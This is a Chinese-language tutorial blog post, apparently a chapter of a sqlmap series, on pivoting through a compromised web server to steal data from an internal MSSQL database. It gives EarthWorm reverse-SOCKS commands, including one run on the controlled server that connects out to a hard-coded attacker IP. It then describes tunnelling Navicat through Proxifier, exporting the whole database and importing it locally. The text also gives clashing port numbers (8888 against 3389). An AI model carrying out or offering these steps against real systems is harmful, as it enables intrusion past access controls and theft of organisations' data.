sqlmap从入门到精通-第四章-4-7 使用EW代理导出和导入MSSQL数据

Posted 2020-12-14 白帽安全技术复现

4.7 使用EW代理导出和导入MSSQL数据

一般的场景就是目标站点获取了webshell，然后数据库的IP地址不在目标站的本地，而且做了精准的访问控制，只允许目标站点的IP地址才能访问数据库，那么这个场景就适合通过代理的方式导出和导入了

4.7.1 设置代理

1. 在独立的公网IP执行命令

命令如下：

ew -s rcsocks -l 1080 -e 3389

 

 

上面的3389端口是独立公网IP地址监听的端口，1080是代理端口

2. 在被控制服务器上执行命令

命令如下：

ew -s rssocks -d 120.78.194.70 -e 3389

 

 

上面是使用独立的公网IP地址连接8888端口

3. 设置Proxifier

此处记得使用socks5即可，配置的IP就是公网的IP地址加代理端口1080，由于我这里是直接在vps上直接使用的，所以我配置的是vps的内网IP地址，大家在实际环境中，如果是在本地PC那么就可以使用公网IP地址加代理端口即可

 

 

 

4. 测试代理

4.7.2 设置Navicat for Sql Server

1. 设置Navicat for Sql Server连接

 

 

正常设置连接即可

2. 连接测试

4.7.3 导出数据库

1. 选择和设置数据库导出

2. 去除删除数据库表选项

3. 导出数据

 

 

4.7.4 导入SQL Server数据库

(1) 在本地SQL Server数据库中创建对应的数据库名称

(2) 设置相同的用户，此处设置导出的是数据对应的用户名和密码，以及与导出的SQL文件对应的用户和权限，防止出现权限不一致而导致导入数据失败的情况

(3) 设置用户的对应权限，在SQL Server中对用户设置可以访问数据库及数据库角色权限

(4) 设置Navicat for SQL Server 连接，使用同样的方法在本地建立数据库连接

(5) 连接数据库服务器，打开需要导入的数据库到dbo处，选择运行SQL文件，选中导出SQL文件，开始导入数据

(6) 数据导入成功后，刷新数据库即可在本地使用

作者已经把本小节发布到公网上了，下面是地址链接：

http://www.mamicode.com/info-detail-2420471.html